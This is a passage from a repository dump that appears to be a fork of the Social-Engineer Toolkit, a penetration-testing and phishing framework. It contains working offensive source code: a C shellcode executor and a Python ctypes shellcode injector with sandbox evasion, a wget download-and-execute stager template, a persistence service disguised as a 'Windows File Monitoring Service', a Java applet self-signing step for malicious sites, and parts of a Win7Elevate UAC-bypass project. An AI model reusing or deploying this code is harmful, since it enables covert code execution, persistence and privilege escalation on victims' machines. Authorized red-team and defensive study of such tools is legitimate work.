this correct: yes 27 | """ 28 | 29 | print_error("*** WARNING ***") 30 | print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk") 31 | print_error("*** WARNING ***") 32 | 33 | # random string used to generate signature of java applet 34 | random_string = generate_random_string(10, 30) 35 | 36 | # grab keystore to use later 37 | subprocess.Popen("keytool -genkey -alias %s -keystore mykeystore -keypass mykeypass -storepass mystorepass" % (random_string), shell=True).wait() 38 | 39 | # self-sign the applet 40 | subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar unsigned.jar %s" % (random_string), shell=True).wait() 41 | 42 | # move it into our html directory 43 | subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait() 44 | subprocess.Popen("mv Signed_Update.jar " + setdir, shell=True) 45 | 46 | # move back to original directory 47 | os.chdir("../../../") 48 | print_status("Java Applet is now signed and will be imported into the website") 49 | -------------------------------------------------------------------------------- /src/html/unsigned/unsigned.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/html/unsigned/unsigned.jar -------------------------------------------------------------------------------- /src/html/web_start.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This is just a simple import for web_start 3 | import sys 4 | import setcore 5 | me = setcore.mod_name() 6 | setcore.debug_msg(me,"importing 'src.html.spawn'",1) 7 | sys.path.append("src/html") 8 | try: reload(spawn) 9 | except: pass 10 | 
-------------------------------------------------------------------------------- /src/payloads/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/__init__.py -------------------------------------------------------------------------------- /src/payloads/exe/shellcodeexec.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/exe/shellcodeexec.binary -------------------------------------------------------------------------------- /src/payloads/exe/shellcodeexec.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Shellcodeexec - original work from Bernardo Damele 4 | 5 | Customized for the Social-Engineer Toolkit (SET) by Dave Kennedy (ReL1K) 6 | 7 | In order to build properly within VS C++ 2010 Express 8 | 9 | Under project properties 10 | change Configuration to Release. 11 | Configuration Properties | C/C++ | Code Generation 12 | Runtime Library setting. It is set to this: Multi-threaded DLL (/MD) 13 | Change it to this: Multi-threaded (/MT) 14 | Rebuild. 
15 | */ 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | DWORD WINAPI exec_payload(LPVOID lpParameter); 24 | #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) 25 | #else 26 | #include 27 | #include 28 | #include 29 | #endif 30 | 31 | int sys_bineval(char *argv); 32 | 33 | int main(int argc, char *argv[]) 34 | { 35 | if (argc < 2) { 36 | exit(-1); 37 | } 38 | 39 | sys_bineval(argv[1]); 40 | 41 | exit(0); 42 | } 43 | 44 | int sys_bineval(char *argv) 45 | { 46 | size_t len; 47 | 48 | #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) 49 | int hugs; 50 | char *code; 51 | #else 52 | int *addr; 53 | size_t page_size; 54 | hugs_t hugs; 55 | #endif 56 | 57 | len = (size_t)strlen(argv); 58 | 59 | #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) 60 | // allocate a +rwx memory page 61 | code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 62 | 63 | // copy over the shellcode 64 | strncpy(code, argv, len); 65 | 66 | // execute it by ASM code defined in exec_payload function 67 | WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &hugs), INFINITE); 68 | #else 69 | hugs = fork(); 70 | if(hugs<0) 71 | return 1; 72 | 73 | if(hugs==0) 74 | { 75 | page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size 76 | page_size = (len+page_size) & ~(page_size); // align to page boundary 77 | 78 | // mmap an +rwx memory page 79 | addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0); 80 | 81 | if (addr == MAP_FAILED) 82 | return 1; 83 | 84 | // copy over the shellcode 85 | strncpy((char *)addr, argv, len); 86 | 87 | // execute it 88 | ((void (*)(void))addr)(); 89 | } 90 | 91 | if(hugs>0) 92 | waitpid(hugs, 0, WNOHANG); 93 | #endif 94 | 95 | return 0; 96 | } 97 | 98 | #if defined(_WIN64) 99 | void __exec_payload(LPVOID); 100 | 101 | DWORD WINAPI exec_payload(LPVOID lpParameter) 102 
| { 103 | __try 104 | { 105 | __exec_payload(lpParameter); 106 | } 107 | __except(EXCEPTION_EXECUTE_HANDLER) 108 | { 109 | } 110 | 111 | return 0; 112 | } 113 | #elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32) 114 | DWORD WINAPI exec_payload(LPVOID lpParameter) 115 | { 116 | __try 117 | { 118 | __asm 119 | { 120 | mov eax, [lpParameter] 121 | call eax 122 | } 123 | } 124 | __except(EXCEPTION_EXECUTE_HANDLER) 125 | { 126 | } 127 | 128 | return 0; 129 | } 130 | #endif 131 | 132 | -------------------------------------------------------------------------------- /src/payloads/powershell/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/powershell/__init__.py -------------------------------------------------------------------------------- /src/payloads/ratte/cygwin1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/ratte/cygwin1.dll -------------------------------------------------------------------------------- /src/payloads/ratte/ratte.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/ratte/ratte.binary -------------------------------------------------------------------------------- /src/payloads/ratte/ratteserver: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/ratte/ratteserver -------------------------------------------------------------------------------- /src/payloads/ratte/ratteserver.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/ratte/ratteserver.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/__init__.py -------------------------------------------------------------------------------- /src/payloads/set_payloads/downloader.posix: -------------------------------------------------------------------------------- 1 | #!/usr/bin/sh 2 | wget URLHERE 3 | chmod +x FILENAMEHERE 4 | ./ FILENAMEHERE 5 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/downloader.windows: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/downloader.windows -------------------------------------------------------------------------------- /src/payloads/set_payloads/http_shell.binary: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/http_shell.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/multi_pyinjector.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/multi_pyinjector.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/persistence.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/persistence.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/persistence.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | ##################################################################################################################### 4 | # 5 | # Social-Engineer Toolkit Persistence Service 6 | # 7 | # Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't 8 | # really a good idea, but it's a start. 
9 | # 10 | ##################################################################################################################### 11 | # 12 | # ex usage: persistence.exe install, start, stop, remove 13 | # 14 | # You can see output of this program running python site-packages\win32\lib\win32traceutil for debugging 15 | # 16 | ##################################################################################################################### 17 | 18 | import win32service 19 | import win32serviceutil 20 | import win32event 21 | import win32evtlogutil 22 | import win32traceutil 23 | import servicemanager 24 | import winerror 25 | import time 26 | import sys 27 | import os 28 | import subprocess 29 | 30 | class aservice(win32serviceutil.ServiceFramework): 31 | _svc_name_ = "windows_monitoring" 32 | _svc_display_name_ = "Windows File Monitoring Service" 33 | _svc_deps_ = ["EventLog"] 34 | 35 | def __init__(self,args): 36 | win32serviceutil.ServiceFramework.__init__(self,args) 37 | self.hWaitStop=win32event.CreateEvent(None, 0, 0, None) 38 | self.isAlive=True 39 | 40 | def SvcStop(self): 41 | # tell Service Manager we are trying to stop (required) 42 | self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) 43 | # set the event to call 44 | win32event.SetEvent(self.hWaitStop) 45 | self.isAlive=False 46 | 47 | def SvcDoRun(self): 48 | import servicemanager 49 | # wait for beeing stopped ... 
50 | self.timeout=1000 # In milliseconds (update every second) 51 | while self.isAlive: 52 | # wait for service stop signal, if timeout, loop again 53 | rc=win32event.WaitForSingleObject(self.hWaitStop, self.timeout) 54 | # expand the filesystem path 55 | windir=os.environ['WINDIR'] 56 | # grab homepath 57 | homedir_path = os.getenv("SystemDrive") 58 | homedir_path = homedir_path + "\\Program Files\\Common Files\\" 59 | # pull the windows operating system version number 60 | windows_version = sys.getwindowsversion()[2] 61 | # pull integer of version number 62 | windows_version = int(windows_version) 63 | # windows XP and below 64 | if windows_version < 3791: 65 | fileopen=file("%s\\system32\\isjxwqjs" % (windir), "r") 66 | # windows 7, vista, 2008, etc. that might have UAC so we write to AppData instead 67 | if windows_version > 3791: 68 | fileopen=file("%s\\isjxwqjs" % (homedir_path), "r") 69 | for line in fileopen: 70 | # pull set-path, this is pulled from interactive shell and written when persistence is called 71 | set_path=line.rstrip() 72 | # specify filename to execute the SET interactive shell 73 | subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 74 | # sleep 30 mins 75 | time.sleep(1800) 76 | self.ReportServiceStatus(win32service.SERVICE_STOPPED) 77 | return 78 | 79 | if __name__ == '__main__': 80 | 81 | # f its called with arguments then run 82 | if len(sys.argv) == 1: 83 | try: 84 | evtsrc_dll = os.path.abspath(servicemanager.__file__) 85 | servicemanager.PrepareToHostSingle(aservice) 86 | servicemanager.Initialize('aservice', evtsrc_dll) 87 | servicemanager.StartServiceCtrlDispatcher() 88 | except win32service.error, details: 89 | if details[0] == winerror.ERROR_FAILED_SERVICE_CONTROLLER_CONNECT: 90 | win32serviceutil.usage() 91 | else: 92 | win32serviceutil.HandleCommandLine(aservice) 93 | -------------------------------------------------------------------------------- 
/src/payloads/set_payloads/pyinjector.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/pyinjector.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/pyinjector_args.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import ctypes 3 | import sys 4 | import multiprocessing 5 | 6 | # Written by Dave Kennedy (ReL1K) @ TrustedSec.com 7 | # Injects shellcode into memory through Python and ctypes 8 | # 9 | # Initial awesome code and credit found here: 10 | # http://www.debasish.in/2012_04_01_archive.html 11 | 12 | # added sandbox evasion here - most sandboxes use only 1 core 13 | if multiprocessing.cpu_count() < 2: 14 | exit() 15 | 16 | # see if we specified shellcode 17 | try: 18 | sc = sys.argv[1] 19 | 20 | # if we didn't specify a param 21 | except IndexError: 22 | sys.exit() 23 | 24 | # need to code the input into the right format through string escape 25 | sc = sc.decode("string_escape") 26 | 27 | # convert to bytearray 28 | sc = bytearray(sc) 29 | 30 | # use types windll.kernel32 for virtualalloc reserves region of pages in virtual address space 31 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), 32 | ctypes.c_int(len(sc)), 33 | ctypes.c_int(0x3000), 34 | ctypes.c_int(0x40)) 35 | 36 | # use virtuallock to lock region for physical address space 37 | ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), 38 | ctypes.c_int(len(sc))) 39 | 40 | # read in the buffer 41 | buf = (ctypes.c_char * len(sc)).from_buffer(sc) 42 | 43 | # moved the memory in 4 byte blocks 44 | ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), 45 | buf, 46 | ctypes.c_int(len(sc))) 47 | # launch in a thread 48 | ht = 
ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), 49 | ctypes.c_int(0), 50 | ctypes.c_int(ptr), 51 | ctypes.c_int(0), 52 | ctypes.c_int(0), 53 | ctypes.pointer(ctypes.c_int(0))) 54 | # waitfor singleobject 55 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)) 56 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/readme.txt: -------------------------------------------------------------------------------- 1 | download.c is the inital stager payload that downloads the shell.exe payload. 2 | 3 | listener.py is the SET listener. 4 | 5 | shell.py is the shell, it uses pyinstaller for byte compilation then upx for packing of size. 6 | 7 | persistence.py is the python based service 8 | 9 | Edit each file if you want to see how to byte compile, what modules are required and what each one is doing. 10 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/shell.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/shell.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/shell.linux: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/shell.linux -------------------------------------------------------------------------------- /src/payloads/set_payloads/shell.osx: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/shell.osx -------------------------------------------------------------------------------- /src/payloads/set_payloads/shell.windows: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/shell.windows -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/CMMN.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #include 6 | 7 | // 8 | // By Pavel 9 | // 10 | // This class is used for holding some data in the memory that can be accessed 11 | // from any separate process in the system by its name. 12 | // It uses memory-mapped files with fixed-size sections. The size is enough to hold 13 | // as many chars as the system supports for file paths. 14 | // 15 | // Once an instance has been created, it can be accessed from another project by its name. 16 | // This shared object is cleaned up when the last instance of this class is destroyed 17 | // across the whole system. 18 | // 19 | // Generally, it is used as follows: 20 | // 1. Create the first instance, set up data, keep it alive forever 21 | // 2. Access the created object by its name from another project by creating 22 | // a temporary instance of that object. When you no longer need this object, destroy it. 23 | // 24 | 25 | class CInterprocessStorage { 26 | public: 27 | static const size_t MaxSize = MAX_PATH; 28 | static const size_t MaxCount = MAX_PATH / sizeof(TCHAR); 29 | 30 | // 31 | // Creates initial named object or opens existing, incrementing its reference count. 
32 | // Resets all object's contents. 33 | // 34 | static CInterprocessStorage *Create( const TCHAR * Name ); 35 | // 36 | // Creates initial named object or opens existing, incrementing its reference count, 37 | // sets its value to the specified string 38 | // 39 | static CInterprocessStorage *Create( const TCHAR * Name, std::wstring& String ); 40 | 41 | // 42 | // Opens existing named object. Does not modify its data. 43 | // 44 | static CInterprocessStorage *Open( const TCHAR * Name ); 45 | 46 | // 47 | // Queries object's name. 48 | // 49 | std::wstring GetName(); 50 | 51 | // 52 | // Queries object's value 53 | // 54 | void GetString( std::wstring& String ); 55 | 56 | // 57 | // Tries to get named object's value, accessing one by the name. 58 | // 59 | static bool GetString( const TCHAR *Name, std::wstring& String ); 60 | 61 | // 62 | // Sets object's Value 63 | // 64 | void SetString( std::wstring& String ); 65 | 66 | ~CInterprocessStorage(); 67 | 68 | private: 69 | const HANDLE _hMapping; 70 | const LPVOID _pBase; 71 | const TCHAR *_Name; 72 | CInterprocessStorage( const TCHAR *Name, HANDLE Mapping, LPVOID Base ); 73 | }; 74 | 75 | // 76 | // Logs data to file. 77 | // Logging takes place only if one special file exists. The file is named after its hosting application 78 | // with .debug appended. 79 | // Example: Code runs in the explorer.exe => logging is allowed if a file named explorer.exe.debug 80 | // is placed next to the exe. 81 | // 82 | // It uses mutual exclusion to prevent unreadable content of the log file. 83 | // Log file has path = %temp%w7e.og 84 | // 85 | // FILE_FLAG_WRITE_THROUGH flag is used to keep log data from being lost if the application crashes. 
86 | // 87 | class CLogger { 88 | public: 89 | static void LogLine( std::wstring& Text ); 90 | static void LogLine( const TCHAR *Text ); 91 | static void LogLine( ); 92 | static void Log( std::wstring& Text ); 93 | static void Log( const TCHAR *Text ); 94 | static void Log( const TCHAR Char ); 95 | static void Reset( ); 96 | 97 | private: 98 | static std::wstring GetPath(); 99 | }; 100 | 101 | // 102 | // Formats system error codes that were obtained by calling GetLastError. 103 | // 104 | class CError { 105 | public: 106 | static std::wstring Format( DWORD ErrorCode ); 107 | static std::wstring Format( DWORD ErrorCode, const TCHAR *Title, const TCHAR *API ); 108 | }; 109 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Redirector.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | 3 | #include "CMMN.h" 4 | #include "Redirector.h" 5 | #include 6 | 7 | const TCHAR *STDIn_PIPE = TEXT("\\\\.\\pipe\\TIOR_In"); 8 | const TCHAR *STDOut_PIPE = TEXT("\\\\.\\pipe\\TIOR_Out"); 9 | const TCHAR *STDErr_PIPE = TEXT("\\\\.\\pipe\\TIOR_Err"); 10 | 11 | DWORD WINAPI Redirector( LPVOID Parameter ) 12 | { 13 | assert( Parameter ); 14 | TRedirectorPair *pair = reinterpret_cast( Parameter ); 15 | 16 | CLogger::Log( TEXT("Hello redirector thread: ") ); 17 | CLogger::LogLine( pair->Name ); 18 | 19 | CHAR read_buff[2]; 20 | DWORD nBytesRead,nBytesWrote; 21 | 22 | bool was_0d = false; 23 | bool error = false; 24 | while ( ! error ) 25 | { 26 | if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) ) 27 | { 28 | CLogger::LogLine( 29 | CError::Format( 30 | GetLastError(), 31 | pair->Name.c_str(), 32 | TEXT("ReadFile") ) ); 33 | error = true && (!pair->KeepAlive); 34 | break; 35 | } 36 | 37 | if ( pair->Linux ) 38 | { 39 | if ( ! 
was_0d ) 40 | { 41 | if ( read_buff[0] == 0xa ) 42 | { 43 | read_buff[0] = 0xd; 44 | read_buff[1] = 0xa; 45 | nBytesRead = 2; 46 | } 47 | } 48 | was_0d = read_buff[nBytesRead - 1] == 0x0d; 49 | } 50 | 51 | for ( DWORD i = 0; i < nBytesRead; i++ ) 52 | { 53 | if ( pair->DestinationConsole ) 54 | { 55 | // 56 | // Emulate console input. 57 | // 58 | 59 | INPUT_RECORD inp = {0}; 60 | inp.EventType = KEY_EVENT; 61 | inp.Event.KeyEvent.uChar.AsciiChar = read_buff[i]; 62 | inp.Event.KeyEvent.wRepeatCount = 1; 63 | inp.Event.KeyEvent.wVirtualKeyCode = 0; 64 | inp.Event.KeyEvent.wVirtualScanCode = 0; 65 | inp.Event.KeyEvent.bKeyDown = TRUE; 66 | inp.Event.KeyEvent.dwControlKeyState = 0; 67 | 68 | if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) ) 69 | { 70 | CLogger::LogLine( 71 | CError::Format( 72 | GetLastError(), 73 | pair->Name.c_str(), 74 | TEXT("WriteConsoleInput") ) ); 75 | error = true && (!pair->KeepAlive); 76 | break; 77 | } 78 | } 79 | else 80 | { 81 | if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) ) 82 | { 83 | CLogger::LogLine( 84 | CError::Format( 85 | GetLastError(), 86 | pair->Name.c_str(), 87 | TEXT("WriteFile") ) ); 88 | error = true && (!pair->KeepAlive); 89 | break; 90 | } 91 | } 92 | } 93 | } 94 | 95 | CLogger::Log( TEXT("Bye redirector thread: ") ); 96 | CLogger::LogLine( pair->Name ); 97 | return EXIT_SUCCESS; 98 | } 99 | 100 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Redirector.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #include 9 | 10 | // 11 | // By Pavel 12 | 13 | // 14 | // Defines names of pipes that can be accessed by name for redirecting IO. 
15 | // 16 | const extern TCHAR *STDIn_PIPE; 17 | const extern TCHAR *STDOut_PIPE; 18 | const extern TCHAR *STDErr_PIPE; 19 | 20 | // 21 | // Structure that is passed to newly created thread. 22 | // Defines how to redirect IO 23 | // 24 | typedef struct _TRedirectorPair { 25 | HANDLE Source; 26 | HANDLE Destination; 27 | // 28 | // Uses directly Console IO instead of ReadFile and WriteFile 29 | // 30 | bool DestinationConsole; 31 | HANDLE Thread; 32 | // 33 | // If true, prevent thread's exit on any IO error. 34 | // 35 | bool KeepAlive; 36 | std::wstring Name; 37 | // 38 | // Appends 0x0A which is the one line terminator for linux with 0x0D. ( \r \n escapes) 39 | // 40 | bool Linux; 41 | }TRedirectorPair; 42 | 43 | DWORD WINAPI Redirector( LPVOID Parameter ); 44 | 45 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/TIOR/TIOR.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/TIOR/TIOR.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/TIOR/stdafx.cpp: 
-------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // TIOR.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/TIOR/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | #include 17 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/TIOR/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
7 | 8 | #include 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual Studio 2010 4 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}" 5 | ProjectSection(SolutionItems) = preProject 6 | Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt 7 | EndProjectSection 8 | EndProject 9 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TIOR", "TIOR\TIOR.vcxproj", "{B36517F4-984C-422C-ADF9-85D5ACD4E30B}" 10 | EndProject 11 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7ElevateDll", "Win7ElevateDll\Win7ElevateDll.vcxproj", "{A1814C92-4DA6-440C-811E-86016AB7433A}" 12 | EndProject 13 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\Win7Elevate.vcxproj", "{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}" 14 | ProjectSection(ProjectDependencies) = postProject 15 | {A1814C92-4DA6-440C-811E-86016AB7433A} = {A1814C92-4DA6-440C-811E-86016AB7433A} 16 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B} = {B36517F4-984C-422C-ADF9-85D5ACD4E30B} 17 | EndProjectSection 18 | EndProject 19 | Global 20 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 21 | Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4) 22 | Debug|Win32 = Debug|Win32 23 | Debug|x64 = Debug|x64 24 | Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4) 25 | Release|Win32 = Release|Win32 26 | Release|x64 = Release|x64 27 | EndGlobalSection 28 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 29 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32 30 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32 31 | 
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32 32 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64 33 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32 34 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32 35 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32 36 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64 37 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64 38 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32 39 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32 40 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32 41 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64 42 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32 43 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32 44 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32 45 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64 46 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64 47 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32 48 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32 49 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32 50 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64 51 